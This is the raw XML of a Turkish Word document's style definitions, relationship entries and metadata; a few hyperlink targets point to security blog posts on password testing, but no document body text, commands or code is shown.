    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Balk2Char">
    <w:name w:val="Başlık 2 Char"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:link w:val="Balk2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00147513"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="stBilgi">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="stBilgiChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C656D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56DC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AltBilgi">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="AltBilgiChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C656D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56DC"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="AklamaBavurusu">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D14C7"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AklamaMetni">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="AklamaMetniChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D14C7"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AklamaMetniChar">
    <w:name w:val="Açıklama Metni Char"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:link w:val="AklamaMetni"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="007D14C7"/>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D14C7"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="AklamaKonusuChar">
    <w:name w:val="Açıklama Konusu Char"/>
    <w:basedOn w:val="AklamaMetniChar"/>
    <w:link w:val="AklamaKonusu"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="007D14C7"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Dzeltme">
    <w:name w:val="Revision"/>
    <w:hidden/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="007D14C7"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="000000"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalonMetni">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalonMetniChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007D14C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14C7"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Arial" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:color w:val="000000"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:eastAsia="tr-TR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Gl">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="VarsaylanParagrafYazTipi"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00BB7D68"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="T1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00BB7D68"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9893"/>
      </w:tabs>
      <w:spacing w:before="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="T2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00BB7D68"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:leader="dot" w:pos="9893"/>
      </w:tabs>
      <w:ind w:left="220"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:b/>
      <w:color w:val="auto"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="T3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BB7D68"/>
    <w:pPr>
      <w:ind w:left="440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
      <w:color w:val="auto"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="AralkYok">
    <w:name w:val="No Spacing"/>
    <w:link w:val="AralkYokChar"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="004D3AAE"/>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4D3AAE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:lang w:val="en-US" w:eastAsia="ja-JP"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BelgeBalantlar">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BelgeBalantlarChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004F348D"/>
    <w:pPr>
      <w:spacing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4F348D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial"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7C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networkpentest.net/2012/04/burp-proxy-ile-web-uygulamalarnda-login.html" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.bga.com.tr/2013/10/szma-testlerinde-offline-windows-parola.html" TargetMode="External"/><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www.ibeast.com/content/tools/CiscoPassword/index.asp"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1A39-2AE9-444D-BA90-9BFDF2CD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872</Words>
  <Characters>27771</Characters>
  <Application>Microsoft Macintosh Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>231</Lines>
  <Paragraphs>6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m</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Microsoft Office Kullanıcısı</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-28T14:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-03-28T14:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>